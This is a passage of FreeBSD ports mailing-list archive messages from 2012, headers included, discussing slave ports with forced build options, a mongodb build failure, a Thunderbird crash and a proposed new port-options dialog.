From: Thierry Thomas To: FreeBSD Ports List Subject: Re: Dealing with options in dependent ports Message-ID: <20121130154740.GA16360@graf.pompo.net> Mail-Followup-To: FreeBSD Ports List References: Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit In-Reply-To: User-Agent: Mutt/1.4.2.3i X-Operating-System: FreeBSD 9.1-PRERELEASE i386 Organization: Kabbale Eros X-Face: (hRbQnK~Pt7$ct`!fupO(`y_WL4^-Iwn4@ly-.,[4xC4xc; y=\ipKMNm<1J>lv@PP~7Z<.t KjAnXLs: X-PGP: 0xC71405A2 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 30 Nov 2012 15:47:55 -0000 Hello, Le ven 30 nov 12 à 16:36:32 +0100, Paul Schmehl écrivait : > I'm working on a port that has an option for a build_depends on another > port. If that option is selected, the dependent port MUST be built with an > option that is not selected by default. > > Is there a way to either force that option to be selected in the dependent > port? Or, failing that, is it possible to pop up a message warning the > installer that they must select that option before building the dependent > port or, if they've already installed it without the option, they must > deinstall and reinstall after selecting that option? > I'd suggest to make a slave port where you force the required option. However, to enforce the right dependency, this option have to produce a different plist. -- Th. Thomas. From owner-freebsd-ports@FreeBSD.ORG Fri Nov 30 16:05:07 2012 Return-Path: Delivered-To: ports@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 316A18A9 for ; Fri, 30 Nov 2012 16:05:07 +0000 (UTC) (envelope-from ehaupt@FreeBSD.org) Received: from mx.critical.ch (cl-8.zrh-02.ch.sixxs.net [IPv6:2001:1620:f00:7::2]) by mx1.freebsd.org (Postfix) with ESMTP id BC0908FC0C for ; Fri, 30 Nov 2012 16:05:06 +0000 (UTC) Received: from wiggles.bwns.ch (snow.ethz.ch [129.132.80.16]) (authenticated bits=0) by mx.critical.ch (8.14.4/8.14.4/critical-1.0) with ESMTP id qAUG54i0027075 for ; Fri, 30 Nov 2012 17:05:05 +0100 (CET) (envelope-from ehaupt@FreeBSD.org) Date: Fri, 30 Nov 2012 17:05:04 +0100 From: Emanuel Haupt To: ports@FreeBSD.org Subject: Re: Dealing with options in dependent ports Message-Id: <20121130170504.7bc37b172743a934a7120bf5@FreeBSD.org> In-Reply-To: <20121130154740.GA16360@graf.pompo.net> References: <20121130154740.GA16360@graf.pompo.net> X-Mailer: Sylpheed 3.3.0 (GTK+ 2.24.6; amd64-portbld-freebsd9.1) Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 30 Nov 2012 16:05:07 -0000 Thierry Thomas wrote: > Hello, >=20 > Le ven 30 nov 12 =E0 16:36:32 +0100, Paul Schmehl > =E9crivait=A0: > > I'm working on a port that has an option for a build_depends on > > another port. If that option is selected, the dependent port MUST > > be built with an option that is not selected by default. > >=20 > > Is there a way to either force that option to be selected in the > > dependent port? Or, failing that, is it possible to pop up a > > message warning the installer that they must select that option > > before building the dependent port or, if they've already installed > > it without the option, they must deinstall and reinstall after > > selecting that option? > >=20 >=20 > I'd suggest to make a slave port where you force the required option. > However, to enforce the right dependency, this option have to produce > a different plist. > --=20 > Th. Thomas. I was in the same situation with dns/ldns requiring python bindings which are not built by default. I solved the problem by creating a stub port dns/py-ldns. Emanuel From owner-freebsd-ports@FreeBSD.ORG Fri Nov 30 17:07:54 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id D436CB06; Fri, 30 Nov 2012 17:07:54 +0000 (UTC) (envelope-from prvs=6745961d0=pschmehl_lists@tx.rr.com) Received: from ip-001.utdallas.edu (ip-001.utdallas.edu [129.110.20.107]) by mx1.freebsd.org (Postfix) with ESMTP id 92E6B8FC15; Fri, 30 Nov 2012 17:07:54 +0000 (UTC) X-Group: None X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AtwHACHnuFCBbgogOmdsb2JhbABEhiy5dwMBAQEBGQhLgh4BAQQBIxVGCwsaAiYCAkMUBgESiAoGrRGSeYEiix6DLjJhA4hdoHg X-IronPort-AV: E=Sophos;i="4.84,192,1355119200"; d="scan'208";a="110773858" Received: from zxtm01.utdallas.edu (HELO utd71538.utdallas.edu) ([129.110.10.32]) by ip-001.utdallas.edu with ESMTP/TLS/DHE-RSA-AES256-SHA; 30 Nov 2012 11:07:46 -0600 Date: Fri, 30 Nov 2012 11:07:45 -0600 From: Paul Schmehl To: Thierry Thomas , FreeBSD Ports List Subject: Re: Dealing with options in dependent ports Message-ID: <9FBCB70DE736FC2D5695947B@utd71538.campus.ad.utdallas.edu> In-Reply-To: <20121130154740.GA16360@graf.pompo.net> References: <20121130154740.GA16360@graf.pompo.net> X-Mailer: Mulberry/4.1.0a1 (Mac OS X) MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8; format=flowed Content-Transfer-Encoding: quoted-printable Content-Disposition: inline; size=1389 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list Reply-To: Paul Schmehl List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 30 Nov 2012 17:07:54 -0000 --On November 30, 2012 4:47:40 PM +0100 Thierry Thomas=20 wrote: > Hello, > > Le ven 30 nov 12 =C3=A0 16:36:32 +0100, Paul Schmehl > =C3=A9crivait=C2=A0: >> I'm working on a port that has an option for a build_depends on another >> port. If that option is selected, the dependent port MUST be built with >> an option that is not selected by default. >> >> Is there a way to either force that option to be selected in the >> dependent port? Or, failing that, is it possible to pop up a message >> warning the installer that they must select that option before building >> the dependent port or, if they've already installed it without the >> option, they must deinstall and reinstall after selecting that option? >> > > I'd suggest to make a slave port where you force the required option. > However, to enforce the right dependency, this option have to produce a > different plist. Thanks. I think that's probably the right answer. --=20 Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. ******************************************* "It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead." Thomas Jefferson "There are some ideas so wrong that only a very intelligent person could believe in them." George Orwell From owner-freebsd-ports@FreeBSD.ORG Fri Nov 30 18:07:42 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id D3046ACC for ; Fri, 30 Nov 2012 18:07:42 +0000 (UTC) (envelope-from villa.alberto@gmail.com) Received: from mail-bk0-f54.google.com (mail-bk0-f54.google.com [209.85.214.54]) by mx1.freebsd.org (Postfix) with ESMTP id 592D08FC08 for ; Fri, 30 Nov 2012 18:07:42 +0000 (UTC) Received: by mail-bk0-f54.google.com with SMTP id je9so419224bkc.13 for ; Fri, 30 Nov 2012 10:07:41 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:sender:in-reply-to:references:from:date :x-google-sender-auth:message-id:subject:to:content-type; bh=DMvFTsid0n0POJ6E5gzEwcwXEeig3+opJuMA/J7QcG4=; b=MbTMUU0SeXwv07W+P99c9HyWN6oFj4yI8A8Q+U1XJNiqqreLF39GzC8Rcaa+SG+tAV y1sCGX/4reCNT+yg3HiDT6y8ELtVlaEx+hy4CiZc6yrPgyfb+obEjs31r1XkIuNQBLrx U5HCYS9TELs8OaynAY/+eBKbNtZVcAchFAxrtHXa3xEY9+//ZqAxSH2YFolEY/GNchCo ainhbfiJZopObxPgoWCiANXh6mXN207QUCBiZvh9/VRvw2DtelAaho72nsxw/yjZScph 1CzzaaLvmoKsUweoL6m16EBwhVW+ZEmiFnQsu75D9boDd/IRQDMPCOXMf77dFL9pt8Yh EEWg== Received: by 10.204.131.76 with SMTP id w12mr655365bks.44.1354298861049; Fri, 30 Nov 2012 10:07:41 -0800 (PST) MIME-Version: 1.0 Sender: villa.alberto@gmail.com Received: by 10.204.8.155 with HTTP; Fri, 30 Nov 2012 10:07:20 -0800 (PST) In-Reply-To: <20121130154740.GA16360@graf.pompo.net> References: <20121130154740.GA16360@graf.pompo.net> From: Alberto Villa Date: Fri, 30 Nov 2012 19:07:20 +0100 X-Google-Sender-Auth: YDrkTo-ixFTlIxiUfao9uqR0k_A Message-ID: Subject: Re: Dealing with options in dependent ports To: FreeBSD Ports List Content-Type: text/plain; charset=ISO-8859-1 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 30 Nov 2012 18:07:42 -0000 On Fri, Nov 30, 2012 at 4:47 PM, Thierry Thomas wrote: > However, to enforce the right dependency, this option have to produce a > different plist. Really? Isn't enough to depend on the package name instead of a file? -- Alberto Villa, FreeBSD committer http://people.FreeBSD.org/~avilla From owner-freebsd-ports@FreeBSD.ORG Fri Nov 30 18:37:32 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id BE52E301 for ; Fri, 30 Nov 2012 18:37:32 +0000 (UTC) (envelope-from thierry@pompo.net) Received: from mx1a.lautre.net (mx1a.lautre.net [80.67.160.71]) by mx1.freebsd.org (Postfix) with ESMTP id 6FCB28FC08 for ; Fri, 30 Nov 2012 18:37:32 +0000 (UTC) Received: from graf.pompo.net (graf.pompo.net [78.225.128.39]) (using TLSv1 with cipher ADH-AES256-SHA (256/256 bits)) (No client certificate requested) (Authenticated sender: thierry@pompo.net) by mx1a.lautre.net (Postfix) with ESMTPSA id E3DB040A39 for ; Fri, 30 Nov 2012 19:37:30 +0100 (CET) Received: by graf.pompo.net (Postfix, from userid 1001) id 8585C1147F; Fri, 30 Nov 2012 19:37:22 +0100 (CET) Date: Fri, 30 Nov 2012 19:37:22 +0100 From: Thierry Thomas To: FreeBSD Ports List Subject: Re: Dealing with options in dependent ports Message-ID: <20121130183722.GB81236@graf.pompo.net> Mail-Followup-To: FreeBSD Ports List References: <20121130154740.GA16360@graf.pompo.net> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit In-Reply-To: User-Agent: Mutt/1.4.2.3i X-Operating-System: FreeBSD 9.1-PRERELEASE i386 Organization: Kabbale Eros X-Face: (hRbQnK~Pt7$ct`!fupO(`y_WL4^-Iwn4@ly-.,[4xC4xc; y=\ipKMNm<1J>lv@PP~7Z<.t KjAnXLs: X-PGP: 0xC71405A2 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 30 Nov 2012 18:37:32 -0000 Le ven 30 nov 12 à 19:07:20 +0100, Alberto Villa écrivait : > On Fri, Nov 30, 2012 at 4:47 PM, Thierry Thomas wrote: > > However, to enforce the right dependency, this option have to produce a > > different plist. > > Really? Isn't enough to depend on the package name instead of a file? xxx_DEPENDS= specific_file:slave_ports -- Th. Thomas. From owner-freebsd-ports@FreeBSD.ORG Fri Nov 30 18:42:10 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 3AA173E6 for ; Fri, 30 Nov 2012 18:42:10 +0000 (UTC) (envelope-from wxs@atarininja.org) Received: from syn.atarininja.org (syn.csh.rit.edu [129.21.49.45]) by mx1.freebsd.org (Postfix) with ESMTP id 0E26F8FC12 for ; Fri, 30 Nov 2012 18:42:09 +0000 (UTC) Received: by syn.atarininja.org (Postfix, from userid 1001) id 9110C5C34; Fri, 30 Nov 2012 13:42:03 -0500 (EST) Date: Fri, 30 Nov 2012 13:42:03 -0500 From: Wesley Shields To: Patrick Subject: Re: databases/mongodb on FreeBSD 9 Message-ID: <20121130184203.GA64227@atarininja.org> References: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.5.21 (2010-09-15) Cc: freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 30 Nov 2012 18:42:10 -0000 On Fri, Nov 30, 2012 at 06:22:28AM -0800, Patrick wrote: > Has anyone had any issues building the mongodb port on FreeBSD 9? > > I'm running 9.0-RELEASE-p5 on i386: > > It's bailing for me here: > > c++ -o > build/freebsd/cpppath_cpp/cxx_c++/ssl/use-system-all/usesm/mongo/shell/linenoise.o > -c -Wnon-virtual-dtor -Woverloaded-virtual -fno-omit-frame-pointer -fPIC > -fno-strict-aliasing -ggdb -pthread -Wall -Wsign-compare > -Wno-unknown-pragmas -Winvalid-pch -O3 -D_SCONS -DMONGO_EXPOSE_MACROS > -DSUPPORT_UTF8 -D__freebsd__ -D_FILE_OFFSET_BITS=64 -DJS_C_STRINGS_ARE_UTF8 > -DMONGO_SSL -DMONGO_HAVE_HEADER_UNISTD_H -DMONGO_HAVE_EXECINFO_BACKTRACE > -Ibuild/freebsd/cpppath_cpp/cxx_c++/ssl/use-system-all/usesm -Isrc > -Ibuild/freebsd/cpppath_cpp/cxx_c++/ssl/use-system-all/usesm/mongo > -Isrc/mongo > -Ibuild/freebsd/cpppath_cpp/cxx_c++/ssl/use-system-all/usesm/mongo/cpp > -Isrc/mongo/cpp -I/usr/local/include src/mongo/shell/linenoise.cpp > In file included from src/mongo/shell/linenoise.cpp:115: > src/mongo/shell/linenoise_utf8.h: In member function 'void > linenoise_utf8::UtfStringMixin::swap(linenoise_utf8::UtfStringMixin&)': > src/mongo/shell/linenoise_utf8.h:145: error: 'swap' is not a member of 'std' > src/mongo/shell/linenoise_utf8.h:146: error: 'swap' is not a member of 'std' > src/mongo/shell/linenoise_utf8.h:147: error: 'swap' is not a member of 'std' > scons: *** > [build/freebsd/cpppath_cpp/cxx_c++/ssl/use-system-all/usesm/mongo/shell/linenoise.o] > Error 1 > scons: building terminated because of errors. > *** Error code 2 It builds fine for me. Can you check what version of boost and it's related packages you are building against? -- WXS From owner-freebsd-ports@FreeBSD.ORG Fri Nov 30 18:46:12 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 0FB804CB; Fri, 30 Nov 2012 18:46:12 +0000 (UTC) (envelope-from prvs=6745961d0=pschmehl_lists@tx.rr.com) Received: from ip-002.utdallas.edu (ip-002.utdallas.edu [129.110.20.108]) by mx1.freebsd.org (Postfix) with ESMTP id 6C2098FC13; Fri, 30 Nov 2012 18:46:11 +0000 (UTC) X-Group: None X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AnAHALL+uFCBbgogOmdsb2JhbABEwBUDAQEBARkIS4IeAQEEATgCRAsLDgouQxQGARKICgbAEoxAg2BhA4hdjj+SOQ X-IronPort-AV: E=Sophos;i="4.84,192,1355119200"; d="scan'208";a="104840321" Received: from zxtm01.utdallas.edu (HELO utd71538.utdallas.edu) ([129.110.10.32]) by ip-002.utdallas.edu with ESMTP/TLS/DHE-RSA-AES256-SHA; 30 Nov 2012 12:46:09 -0600 Date: Fri, 30 Nov 2012 12:46:08 -0600 From: Paul Schmehl To: Alberto Villa , FreeBSD Ports List Subject: Re: Dealing with options in dependent ports Message-ID: <601F44F1995485BC7DB3BCF1@utd71538.campus.ad.utdallas.edu> In-Reply-To: References: <20121130154740.GA16360@graf.pompo.net> X-Mailer: Mulberry/4.1.0a1 (Mac OS X) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline; size=2099 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list Reply-To: Paul Schmehl List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 30 Nov 2012 18:46:12 -0000 --On November 30, 2012 7:07:20 PM +0100 Alberto Villa wrote: > On Fri, Nov 30, 2012 at 4:47 PM, Thierry Thomas > wrote: >> However, to enforce the right dependency, this option have to produce a >> different plist. > > Really? Isn't enough to depend on the package name instead of a file? No. The dependency installs files that are not otherwise installed, so the pkg-plist has to reflect that. Here's how I did it in the port I just created a slave for. Created this section in the main port's Makefile: .if defined(SLAVE) OPTIONS_DEFINE+= BROCCOLI OPTIONS_DEFAULT+= BROCCOLI BROCCOLI_DESC= Build support for libbroccoli communications .endif This adds the option and enforces it being selected if you install the slave port. Then created this section in the main port's Makefile: .if ${PORT_OPTIONS:MBROCCOLI} PLIST_SUB+= BROCCOLI="" pre-configure: (cd ${WRKSRC}/aux/broccoli && ./configure) pre-build: (cd ${WRKSRC}/aux/broccoli && ${MAKE}) post-build: patch ${BUILD_WRKSRC}/cmake_install.cmake ${FILESDIR}/broccoli.patch .else PLIST_SUB+= BROCCOLI="@comment " .endif The PLIST_SUB section allows you to add files to the pkg-plist that are provisional, based on the install of the slave port. Then the pkg_plist sub has the files included with the macro: %%BROCCOLI%%include/broccoli.h %%BROCCOLI%%lib/libbinpac.a %%BROCCOLI%%lib/libbroccoli.a %%BROCCOLI%%lib/libbroccoli.so %%BROCCOLI%%lib/libbroccoli.so.5 %%BROCCOLI%%lib/libbroccoli.so.5.1.0 Those only get removed if the option was selected, so deinstall won't throw errors if you install the main port without that option. -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. ******************************************* "It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead." Thomas Jefferson "There are some ideas so wrong that only a very intelligent person could believe in them." George Orwell From owner-freebsd-ports@FreeBSD.ORG Sat Dec 1 03:16:16 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 28737988 for ; Sat, 1 Dec 2012 03:16:16 +0000 (UTC) (envelope-from jnagyjr1978@gmail.com) Received: from mail-gg0-f182.google.com (mail-gg0-f182.google.com [209.85.161.182]) by mx1.freebsd.org (Postfix) with ESMTP id C61628FC08 for ; Sat, 1 Dec 2012 03:16:15 +0000 (UTC) Received: by mail-gg0-f182.google.com with SMTP id e5so197259ggh.13 for ; Fri, 30 Nov 2012 19:16:09 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=message-id:date:from:user-agent:mime-version:to:subject :x-enigmail-version:content-type; bh=MrMbsxmQ3oii1gkMThLzTT34FNCf0P7PQxE/593BgFs=; b=Ep2TpDF19aWY3X9aiVJ/NXcRsSFc7fc4hT6ZjHRvqYRgk1c097317d/L2zWv+3E3BC jlZH/Jr3CzLR0fzF4pi1WbpcuL5EK/4wl9Anfb0T0NjM60DG+KCd5GM6hjyKki/8K8U8 BiWoHdJNp4QgVIr4LF+vEktDSZYYxPaWbeJ2vE5X/CRVXZHccukYtnTSJLAD0Vmwl30e gC98hdBjzjCgkKPBeDp69NxUzX7Um/CU3IC53tJCIkIOohtIpI+CZn+imaTnjbAZK172 sCVfWUe1p5WQogB1vOudzuIAq6x3XHF9qUXblNPjpxWtwyAyV2fdFwXELyjyprsoFD2J POfg== Received: by 10.236.35.131 with SMTP id u3mr3886370yha.12.1354331769270; Fri, 30 Nov 2012 19:16:09 -0800 (PST) Received: from alex-laptop.localhost (vid-196.dhcp.grp10.tnmmrl.infoave.net. [204.116.254.196]) by mx.google.com with ESMTPS id t2sm6238040anj.3.2012.11.30.19.16.07 (version=SSLv3 cipher=OTHER); Fri, 30 Nov 2012 19:16:07 -0800 (PST) Message-ID: <50B97669.8050704@gmail.com> Date: Fri, 30 Nov 2012 21:15:53 -0600 From: Joseph a Nagy Jr User-Agent: Mozilla/5.0 (X11; FreeBSD i386; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: FreeBSD Ports Subject: Thunderbird 17.0.1_1 Seg Fault 11's on Enigmail and Lightning X-Enigmail-Version: 1.4.6 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="------------enig0E225924AED3902378BD5FD5" X-Content-Filtered-By: Mailman/MimeDel 2.1.14 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 01 Dec 2012 03:16:16 -0000 This is an OpenPGP/MIME signed message (RFC 2440 and 3156) --------------enig0E225924AED3902378BD5FD5 Content-Type: multipart/mixed; boundary="------------090507090800030303030005" This is a multi-part message in MIME format. --------------090507090800030303030005 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Okay, I have a .core and .txt file with all the info anyone would need, I imagine, if it would help in solving this issue. When I run Thunderbird 17.0.1_1 and try to select the "Generate" option when I open "Key Management" from the OpenPGP menu (Enigmail 1.4.6) or dismiss even reminders from Lightning (1.9b1), Thunderbird will exit with segmentation fault: 11(core dumped) leaving behind a 116MB core file= =2E Running thunderbird > thunderbird.debug 2>&1 captures any errors but I have no idea what to look for. I can put both files on a http server in short-order, just let me know what you all need= =2E FreeBSD alex-laptop.localhost 9.0-RELEASE-p5 FreeBSD 9.0-RELEASE-p5 #0: Sat Nov 24 10:20:42 CST 2012 root@alex-laptop.localhost:/usr/obj/usr/src/sys/ALEX-LAPTOP i386 --=20 Yours in Christ, Joseph A Nagy Jr "Whoever loves instruction loves knowledge, But he who hates correction is stupid." -- Proverbs 12:1 Emails are not formal business letters, whatever businesses may want. Original content CopyFree (F) under the OWL http://owl.apotheon.org --------------090507090800030303030005-- --------------enig0E225924AED3902378BD5FD5 Content-Type: application/pgp-signature; name="signature.asc" Content-Description: OpenPGP digital signature Content-Disposition: attachment; filename="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.19 (FreeBSD) Comment: Using GnuPG with undefined - http://www.enigmail.net/ iQEcBAEBAgAGBQJQuXZ0AAoJECqR4kIlFcuB690H/34T45hrqmG3kbRa01UlSaka UMBfXESjMF5sN+mR4fJN0G+mvLgMsM9ZU46z27nkMK1Is3pN9+6oujGkcsLdqWrf wj/LvAC6um/QTuxBnPnrbXi3OXuatJLd+Awn8V4FO/Lmf3rJ+3qNukc+QtufKHIh qQpqMX18iyy6IPp5CNrEn2YVMRS00n4cNHF6nnxs43zWG7xZE7IqXXzg4dbW1eRm sFSLB5F0oZCq5Jp5pClzTNEJcXow7IEMUxs6jb0T9VX+3JV/E8q7BV02G0E80jM3 wC/6nMUdQcTWl0riSJJ8RqOhAEpBLiSHb3jZNBKJ7p5MFrXtmhUX3hriUvfNzjg= =5JGZ -----END PGP SIGNATURE----- --------------enig0E225924AED3902378BD5FD5-- From owner-freebsd-ports@FreeBSD.ORG Sat Dec 1 07:20:21 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 288237F5 for ; Sat, 1 Dec 2012 07:20:21 +0000 (UTC) (envelope-from mueller23@insightbb.com) Received: from mail.insightbb.com (smtp.insight.synacor.com [208.47.185.22]) by mx1.freebsd.org (Postfix) with ESMTP id CB4848FC08 for ; Sat, 1 Dec 2012 07:20:20 +0000 (UTC) X_CMAE_Category: 0,0 Undefined,Undefined X-CNFS-Analysis: v=2.0 cv=Hvf06jvS c=1 sm=0 a=Dm9TOXL4taQ+Gy1KovpL+A==:17 a=-Qq6p921mcUA:10 a=jLN7EqiLvroA:10 a=9YQ-1ebCAAAA:8 a=Amq_-W6gWFYA:10 a=zWGVsrqIAAAA:8 a=VAMm1qzQAAAA:8 a=xtERp6CFAAAA:8 a=Dc8GuCoWPOVD4Wo3KnYA:9 a=dRwE02sqAs4A:10 a=iDq_lVCWZgkA:10 a=Dm9TOXL4taQ+Gy1KovpL+A==:117 X-CM-Score: 0 X-Scanned-by: Cloudmark Authority Engine Authentication-Results: smtp01.insight.synacor.com smtp.mail=mueller23@insightbb.com; spf=softfail; sender-id=softfail Authentication-Results: smtp01.insight.synacor.com header.from=mueller23@insightbb.com; sender-id=softfail Received-SPF: softfail (smtp01.insight.synacor.com: transitional domain insightbb.com does not designate 74.130.198.7 as permitted sender) Received: from [74.130.198.7] ([74.130.198.7:34095] helo=localhost) by mail.insightbb.com (envelope-from ) (ecelerity 2.2.3.49 r(42060/42061)) with ESMTP id 2E/D0-29719-3BFA9B05; Sat, 01 Dec 2012 02:20:19 -0500 Date: Sat, 01 Dec 2012 02:20:19 -0500 Message-ID: <2E.D0.29719.3BFA9B05@smtp01.insight.synacor.com> From: "Thomas Mueller" To: freebsd-ports@freebsd.org Subject: Re: Discussion concerning: New dialog for ports Cc: "Ilya A. Arkhipov" X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 01 Dec 2012 07:20:21 -0000 I sent this message but forgot to change a subject line from an old message, so intended recipients/readers may have missed it. Sorry for any confusion caused by my slip! > Hi Folks, > Few week ago I started work on new dialog for ports, main idea it's adding functionality, I guess you know ;) > I took checklist.c from libdialog and modified it for us. Regarding license, I discussed with Thomas E. Dickey(author dialog) he said I can't change LGPL to > +BSD but it should not be a problem. > What we have now: > - check + radio lists in on box (and yes we can put off radiobox) > - separate line with text > - dynamic width/height size > - all features from checklist.c :) > -- mouse support > -- hotkey for find a lines > My plan: > - add Help button/F1/alt-h/esc-1 (actually don't know how will be better) > - button for license > - fixing bugs >_< > - start work on parsing receiving data, after that should be ready for testing. > Regarding parsing data I want discuss here. Wanna correct understand what will be better, now I have few variants: > 1. Get all data from env. variables > 2. Use the same with old dialog style, I mean receive from STDIN > 3. From file? <- guess bad idea > Your ideas? > And certainly screeshots: > Big description(just for test); > In X -- http://imm.io/NkVR > In Terminal -- https://www.dropbox.com/s/bzt8zszpk40jrso/2012-11-29%2014.59.53.jpg > With license button: > in X -- http://imm.io/Nl9K > You can find my repo there: https://bitbucket.org/m1cro/d4p/. I'll be happy for all response ;) > With Best Regards, > Ilya A. Arkhipov I'd like a dialog, if there is to be a dialog rather than setting options in /etc/make.conf, that would not mess up when the user keeps a log of a build using tee or script. One possibility would be to do the dialog in a virtual terminal separate from the ports build. Configuration dialog has to work from nongraphical interface, since FreeBSD base system, where a user would start, has no graphical interface. I like the idea of putting port options in a file, as NetBSD pkgsrc does using /etc/mk.conf, or possibly /usr/pkg/etc/mk.conf when on a non-NetBSD platform. Tom From owner-freebsd-ports@FreeBSD.ORG Sat Dec 1 11:54:04 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 718BD34B for ; Sat, 1 Dec 2012 11:54:04 +0000 (UTC) (envelope-from boostemail@yahoo.co.uk) Received: from nm22-vm1.bullet.mail.ukl.yahoo.com (nm22-vm1.bullet.mail.ukl.yahoo.com [217.12.10.75]) by mx1.freebsd.org (Postfix) with ESMTP id ACF018FC0C for ; Sat, 1 Dec 2012 11:54:03 +0000 (UTC) Received: from [217.12.10.82] by nm22.bullet.mail.ukl.yahoo.com with NNFMP; 01 Dec 2012 11:51:48 -0000 Received: from [77.238.184.57] by tm16.bullet.mail.ukl.yahoo.com with NNFMP; 01 Dec 2012 11:51:48 -0000 Received: from [127.0.0.1] by smtp126.mail.ukl.yahoo.com with NNFMP; 01 Dec 2012 11:51:48 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.co.uk; s=s1024; t=1354362708; bh=imyQrjOgUxHt+3qW/3JPrlXydC1Bh2YmzdiTHcS82l0=; h=X-Yahoo-Newman-Id:X-Yahoo-Newman-Property:X-YMail-OSG:X-Yahoo-SMTP:Received:Date:From:Reply-To:To:Message-ID:Subject:MIME-Version:Content-Type; b=xMB7fO2ZloxUr6H5lTDQ08ZdY+xKXas5X9hb1/LW5RAgUw0y3wi99pM+xEvf5qHEBryqCMdvwIOgD2UMtvaov86FV427h8Qik+WeGWVmb+2bH6fly2swiQynOu/274nfsls4RE0Wy8d/sll2K/l6Q6o10WGvs+TMi42qrMHGOq8= X-Yahoo-Newman-Id: 31661.4189.bm@smtp126.mail.ukl.yahoo.com X-Yahoo-Newman-Property: ymail-3 X-YMail-OSG: X5uVdBsVM1kaBSo5c0bOUkWDlllYlJvrCaVWDg_veFnNZhi MUDpgbfj9Iz1N4EhdbYfwudD2cjOVzUWhb1uLFK8OHkVwJSsMrwvwdWXrLaj fQ1yU4h69BmvBTrN1vUZp_Y27F3FKQrTO.q8tmafHsS2XAEnj6scbZ0oJUib y.6tTVwNriCNiM0mpOiBKfXrkD2SB9.c4Peu2LLRHYcrXiFcZBN0QJqLnnzv 